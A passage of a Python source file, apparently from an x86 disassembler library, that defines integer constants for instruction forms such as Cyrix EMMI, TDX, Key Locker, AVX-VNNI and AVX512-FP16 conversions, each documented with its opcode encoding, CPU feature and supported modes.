``PMULHRW mm, mm/m64``
``0F 59 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVNZB_MM_M64: int = 4262
"""
``PMVNZB mm, m64``
``0F 5A /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVLZB_MM_M64: int = 4263
"""
``PMVLZB mm, m64``
``0F 5B /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVGEZB_MM_M64: int = 4264
"""
``PMVGEZB mm, m64``
``0F 5C /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMULHRIW_MM_MMM64: int = 4265
"""
``PMULHRIW mm, mm/m64``
``0F 5D /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMACHRIW_MM_M64: int = 4266
"""
``PMACHRIW mm, m64``
``0F 5E /r``
``CYRIX_EMMI``
``16/32-bit``
"""
CYRIX_D9D7: int = 4267
"""
``UNDOC``
``D9 D7``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_D9E2: int = 4268
"""
``UNDOC``
``D9 E2``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FTSTP: int = 4269
"""
``FTSTP``
``D9 E6``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_D9E7: int = 4270
"""
``UNDOC``
``D9 E7``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FRINT2: int = 4271
"""
``FRINT2``
``DB FC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FRICHOP: int = 4272
"""
``FRICHOP``
``DD FC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DED8: int = 4273
"""
``UNDOC``
``DE D8``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDA: int = 4274
"""
``UNDOC``
``DE DA``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDC: int = 4275
"""
``UNDOC``
``DE DC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDD: int = 4276
"""
``UNDOC``
``DE DD``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDE: int = 4277
"""
``UNDOC``
``DE DE``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FRINEAR: int = 4278
"""
``FRINEAR``
``DF FC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
TDCALL: int = 4279
"""
``TDCALL``
``66 0F 01 CC``
``TDX``
``16/32/64-bit``
"""
SEAMRET: int = 4280
"""
``SEAMRET``
``66 0F 01 CD``
``TDX``
``64-bit``
"""
SEAMOPS: int = 4281
"""
``SEAMOPS``
``66 0F 01 CE``
``TDX``
``64-bit``
"""
SEAMCALL: int = 4282
"""
``SEAMCALL``
``66 0F 01 CF``
``TDX``
``64-bit``
"""
AESENCWIDE128KL_M384: int = 4283
"""
``AESENCWIDE128KL m384, <XMM0-7>``
``F3 0F 38 D8 !(11):000:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
AESDECWIDE128KL_M384: int = 4284
"""
``AESDECWIDE128KL m384, <XMM0-7>``
``F3 0F 38 D8 !(11):001:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
AESENCWIDE256KL_M512: int = 4285
"""
``AESENCWIDE256KL m512, <XMM0-7>``
``F3 0F 38 D8 !(11):010:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
AESDECWIDE256KL_M512: int = 4286
"""
``AESDECWIDE256KL m512, <XMM0-7>``
``F3 0F 38 D8 !(11):011:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
LOADIWKEY_XMM_XMM: int = 4287
"""
``LOADIWKEY xmm1, xmm2, <EAX>, <XMM0>``
``F3 0F 38 DC 11:rrr:bbb``
``KL``
``16/32/64-bit``
"""
AESENC128KL_XMM_M384: int = 4288
"""
``AESENC128KL xmm, m384``
``F3 0F 38 DC !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
AESDEC128KL_XMM_M384: int = 4289
"""
``AESDEC128KL xmm, m384``
``F3 0F 38 DD !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
AESENC256KL_XMM_M512: int = 4290
"""
``AESENC256KL xmm, m512``
``F3 0F 38 DE !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
AESDEC256KL_XMM_M512: int = 4291
"""
``AESDEC256KL xmm, m512``
``F3 0F 38 DF !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
ENCODEKEY128_R32_R32: int = 4292
"""
``ENCODEKEY128 r32, r32, <XMM0-2>, <XMM4-6>``
``F3 0F 38 FA 11:rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
ENCODEKEY256_R32_R32: int = 4293
"""
``ENCODEKEY256 r32, r32, <XMM0-6>``
``F3 0F 38 FB 11:rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_XMM_XMM: int = 4294
"""
``VBROADCASTSS xmm1, xmm2``
``VEX.128.66.0F38.W0 18 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_YMM_XMM: int = 4295
"""
``VBROADCASTSS ymm1, xmm2``
``VEX.256.66.0F38.W0 18 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VBROADCASTSD_YMM_XMM: int = 4296
"""
``VBROADCASTSD ymm1, xmm2``
``VEX.256.66.0F38.W0 19 /r``
``AVX2``
``16/32/64-bit``
"""
VMGEXIT_F2: int = 4297
"""
``VMGEXIT``
``F2 0F 01 D9``
``SEV-ES``
``16/32/64-bit``
"""
UIRET: int = 4298
"""
``UIRET``
``F3 0F 01 EC``
``UINTR``
``64-bit``
"""
TESTUI: int = 4299
"""
``TESTUI``
``F3 0F 01 ED``
``UINTR``
``64-bit``
"""
CLUI: int = 4300
"""
``CLUI``
``F3 0F 01 EE``
``UINTR``
``64-bit``
"""
STUI: int = 4301
"""
``STUI``
``F3 0F 01 EF``
``UINTR``
``64-bit``
"""
SENDUIPI_R64: int = 4302
"""
``SENDUIPI r64``
``F3 0F C7 /6``
``UINTR``
``64-bit``
"""
HRESET_IMM8: int = 4303
"""
``HRESET imm8, <EAX>``
``F3 0F 3A F0 C0 ib``
``HRESET``
``16/32/64-bit``
"""
VEX_VPDPBUSD_XMM_XMM_XMMM128: int = 4304
"""
``VPDPBUSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 50 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPBUSD_YMM_YMM_YMMM256: int = 4305
"""
``VPDPBUSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 50 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPBUSDS_XMM_XMM_XMMM128: int = 4306
"""
``VPDPBUSDS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 51 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPBUSDS_YMM_YMM_YMMM256: int = 4307
"""
``VPDPBUSDS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 51 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSD_XMM_XMM_XMMM128: int = 4308
"""
``VPDPWSSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 52 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSD_YMM_YMM_YMMM256: int = 4309
"""
``VPDPWSSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 52 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSDS_XMM_XMM_XMMM128: int = 4310
"""
``VPDPWSSDS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 53 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSDS_YMM_YMM_YMMM256: int = 4311
"""
``VPDPWSSDS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 53 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
CCS_HASH_16: int = 4312
"""
``CCS_HASH``
``a16 F3 0F A6 E8``
``PADLOCK_GMI``
``16/32-bit``
"""
CCS_HASH_32: int = 4313
"""
``CCS_HASH``
``a32 F3 0F A6 E8``
``PADLOCK_GMI``
``16/32/64-bit``
"""
CCS_HASH_64: int = 4314
"""
``CCS_HASH``
``a64 F3 0F A6 E8``
``PADLOCK_GMI``
``64-bit``
"""
CCS_ENCRYPT_16: int = 4315
"""
``CCS_ENCRYPT``
``a16 F3 0F A7 F0``
``PADLOCK_GMI``
``16/32-bit``
"""
CCS_ENCRYPT_32: int = 4316
"""
``CCS_ENCRYPT``
``a32 F3 0F A7 F0``
``PADLOCK_GMI``
``16/32/64-bit``
"""
CCS_ENCRYPT_64: int = 4317
"""
``CCS_ENCRYPT``
``a64 F3 0F A7 F0``
``PADLOCK_GMI``
``64-bit``
"""
LKGS_RM16: int = 4318
"""
``LKGS r/m16``
``o16 F2 0F 00 /6``
``LKGS``
``64-bit``
"""
LKGS_R32M16: int = 4319
"""
``LKGS r32/m16``
``o32 F2 0F 00 /6``
``LKGS``
``64-bit``
"""
LKGS_R64M16: int = 4320
"""
``LKGS r64/m16``
``F2 o64 0F 00 /6``
``LKGS``
``64-bit``
"""
ERETU: int = 4321
"""
``ERETU``
``F3 0F 01 CA``
``FRED``
``64-bit``
"""
ERETS: int = 4322
"""
``ERETS``
``F2 0F 01 CA``
``FRED``
``64-bit``
"""
EVEX_VADDPH_XMM_K1Z_XMM_XMMM128B16: int = 4323
"""
``VADDPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 58 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VADDPH_YMM_K1Z_YMM_YMMM256B16: int = 4324
"""
``VADDPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 58 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VADDPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4325
"""
``VADDPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 58 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VADDSH_XMM_K1Z_XMM_XMMM16_ER: int = 4326
"""
``VADDSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 58 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPPH_KR_K1_XMM_XMMM128B16_IMM8: int = 4327
"""
``VCMPPH k1 {k2}, xmm2, xmm3/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 C2 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPPH_KR_K1_YMM_YMMM256B16_IMM8: int = 4328
"""
``VCMPPH k1 {k2}, ymm2, ymm3/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 C2 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPPH_KR_K1_ZMM_ZMMM512B16_IMM8_SAE: int = 4329
"""
``VCMPPH k1 {k2}, zmm2, zmm3/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 C2 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPSH_KR_K1_XMM_XMMM16_IMM8_SAE: int = 4330
"""
``VCMPSH k1 {k2}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.F3.0F3A.W0 C2 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCOMISH_XMM_XMMM16_SAE: int = 4331
"""
``VCOMISH xmm1, xmm2/m16{sae}``
``EVEX.LIG.MAP5.W0 2F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PH_XMM_K1Z_XMMM128B32: int = 4332
"""
``VCVTDQ2PH xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PH_XMM_K1Z_YMMM256B32: int = 4333
"""
``VCVTDQ2PH xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4334
"""
``VCVTDQ2PH ymm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.MAP5.W0 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPD2PH_XMM_K1Z_XMMM128B64: int = 4335
"""
``VCVTPD2PH xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.MAP5.W1 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPD2PH_XMM_K1Z_YMMM256B64: int = 4336
"""
``VCVTPD2PH xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.MAP5.W1 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPD2PH_XMM_K1Z_ZMMM512B64_ER: int = 4337
"""
``VCVTPD2PH xmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.MAP5.W1 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2DQ_XMM_K1Z_XMMM64B16: int = 4338
"""
``VCVTPH2DQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.66.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2DQ_YMM_K1Z_XMMM128B16: int = 4339
"""
``VCVTPH2DQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.66.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2DQ_ZMM_K1Z_YMMM256B16_ER: int = 4340
"""
``VCVTPH2DQ zmm1 {k1}{z}, ymm2/m256/m16bcst{er}``
``EVEX.512.66.MAP5.W0 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PD_XMM_K1Z_XMMM32B16: int = 4341
"""
``VCVTPH2PD xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.MAP5.W0 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PD_YMM_K1Z_XMMM64B16: int = 4342
"""
``VCVTPH2PD ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.MAP5.W0 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PD_ZMM_K1Z_XMMM128B16_SAE: int = 4343
"""
``VCVTPH2PD zmm1 {k1}{z}, xmm2/m128/m16bcst{sae}``
``EVEX.512.MAP5.W0 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PSX_XMM_K1Z_XMMM64B16: int = 4344
"""
``VCVTPH2PSX xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.66.MAP6.W0 13 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PSX_YMM_K1Z_XMMM128B16: int = 4345
"""
``VCVTPH2PSX ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.66.MAP6.W0 13 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PSX_ZMM_K1Z_YMMM256B16_SAE: int = 4346
"""
``VCVTPH2PSX zmm1 {k1}{z}, ymm2/m256/m16bcst{sae}``
``EVEX.512.66.MAP6.W0 13 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2QQ_XMM_K1Z_XMMM32B16: int = 4347
"""
``VCVTPH2QQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 7B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2QQ_YMM_K1Z_XMMM64B16: int = 4348
"""
``VCVTPH2QQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 7B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2QQ_ZMM_K1Z_XMMM128B16_ER: int = 4349
"""
``VCVTPH2QQ zmm1 {k1}{z}, xmm2/m128/m16bcst{er}``
``EVEX.512.66.MAP5.W0 7B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4350
"""
``VCVTPH2UDQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4351
"""
``VCVTPH2UDQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UDQ_ZMM_K1Z_YMMM256B16_ER: int = 4352
"""
``VCVTPH2UDQ zmm1 {k1}{z}, ymm2/m256/m16bcst{er}``
``EVEX.512.MAP5.W0 79 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4353
"""
``VCVTPH2UQQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4354
"""
``VCVTPH2UQQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UQQ_ZMM_K1Z_XMMM128B16_ER: int = 4355
"""
``VCVTPH2UQQ zmm1 {k1}{z}, xmm2/m128/m16bcst{er}``
``EVEX.512.66.MAP5.W0 79 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UW_XMM_K1Z_XMMM128B16: int = 4356
"""
``VCVTPH2UW xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UW_YMM_K1Z_YMMM256B16: int = 4357
"""
``VCVTPH2UW ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UW_ZMM_K1Z_ZMMM512B16_ER: int = 4358
"""
``VCVTPH2UW zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2W_XMM_K1Z_XMMM128B16: int = 4359
"""
``VCVTPH2W xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2W_YMM_K1Z_YMMM256B16: int = 4360
"""
``VCVTPH2W ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2W_ZMM_K1Z_ZMMM512B16_ER: int = 4361
"""
``VCVTPH2W zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.66.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPS2PHX_XMM_K1Z_XMMM128B32: int = 4362
"""
``VCVTPS2PHX xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.MAP5.W0 1D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPS2PHX_XMM_K1Z_YMMM256B32: int = 4363
"""
``VCVTPS2PHX xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.MAP5.W0 1D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPS2PHX_YMM_K1Z_ZMMM512B32_ER: int = 4364
"""
``VCVTPS2PHX ymm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.66.MAP5.W0 1D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PH_XMM_K1Z_XMMM128B64: int = 4365
"""
``VCVTQQ2PH xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.MAP5.W1 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PH_XMM_K1Z_YMMM256B64: int = 4366
"""
``VCVTQQ2PH xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.MAP5.W1 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4367
"""
``VCVTQQ2PH xmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.MAP5.W1 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSD2SH_XMM_K1Z_XMM_XMMM64_ER: int = 4368
"""
``VCVTSD2SH xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.MAP5.W1 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2SD_XMM_K1Z_XMM_XMMM16_SAE: int = 4369
"""
``VCVTSH2SD xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2SI_R32_XMMM16_ER: int = 4370
"""
``VCVTSH2SI r32, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W0 2D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2SI_R64_XMMM16_ER: int = 4371
"""
``VCVTSH2SI r64, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W1 2D /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTSH2SS_XMM_K1Z_XMM_XMMM16_SAE: int = 4372
"""
``VCVTSH2SS xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.MAP6.W0 13 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2USI_R32_XMMM16_ER: int = 4373
"""
``VCVTSH2USI r32, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W0 79 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2USI_R64_XMMM16_ER: int = 4374
"""
``VCVTSH2USI r64, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W1 79 /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTSI2SH_XMM_XMM_RM32_ER: int = 4375
"""
``VCVTSI2SH xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.MAP5.W0 2A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSI2SH_XMM_XMM_RM64_ER: int = 4376
"""
``VCVTSI2SH xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.MAP5.W1 2A /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTSS2SH_XMM_K1Z_XMM_XMMM32_ER: int = 4377
"""
``VCVTSS2SH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.MAP5.W0 1D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2DQ_XMM_K1Z_XMMM64B16: int = 4378
"""
``VCVTTPH2DQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.F3.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2DQ_YMM_K1Z_XMMM128B16: int = 4379
"""
``VCVTTPH2DQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.F3.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2DQ_ZMM_K1Z_YMMM256B16_SAE: int = 4380
"""
``VCVTTPH2DQ zmm1 {k1}{z}, ymm2/m256/m16bcst{sae}``
``EVEX.512.F3.MAP5.W0 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2QQ_XMM_K1Z_XMMM32B16: int = 4381
"""
``VCVTTPH2QQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2QQ_YMM_K1Z_XMMM64B16: int = 4382
"""
``VCVTTPH2QQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2QQ_ZMM_K1Z_XMMM128B16_SAE: int = 4383
"""
``VCVTTPH2QQ zmm1 {k1}{z}, xmm2/m128/m16bcst{sae}``
``EVEX.512.66.MAP5.W0 7A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4384
"""
``VCVTTPH2UDQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4385
"""
``VCVTTPH2UDQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UDQ_ZMM_K1Z_YMMM256B16_SAE: int = 4386
"""
``VCVTTPH2UDQ zmm1 {k1}{z}, ymm2/m256/m16bcst{sae}``
``EVEX.512.MAP5.W0 78 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4387
"""
``VCVTTPH2UQQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4388
"""
``VCVTTPH2UQQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UQQ_ZMM_K1Z_XMMM128B16_SAE: int = 4389
"""
``VCVTTPH2UQQ zmm1 {k1}{z}, xmm2/m128/m16bcst{sae}``
``EVEX.512.66.MAP5.W0 78 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UW_XMM_K1Z_XMMM128B16: int = 4390
"""
``VCVTTPH2UW xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UW_YMM_K1Z_YMMM256B16: int = 4391
"""
``VCVTTPH2UW ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UW_ZMM_K1Z_ZMMM512B16_SAE: int = 4392
"""
``VCVTTPH2UW zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}``
``EVEX.512.MAP5.W0 7C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2W_XMM_K1Z_XMMM128B16: int = 4393
"""
``VCVTTPH2W xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2W_YMM_K1Z_YMMM256B16: int = 4394
"""
``VCVTTPH2W ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2W_ZMM_K1Z_ZMMM512B16_SAE: int = 4395
"""
``VCVTTPH2W zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}``
``EVEX.512.66.MAP5.W0 7C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTSH2SI_R32_XMMM16_SAE: int = 4396
"""
``VCVTTSH2SI r32, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 2C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTSH2SI_R64_XMMM16_SAE: int = 4397
"""
``VCVTTSH2SI r64, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W1 2C /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTTSH2USI_R32_XMMM16_SAE: int = 4398
"""
``VCVTTSH2USI r32, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 78 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
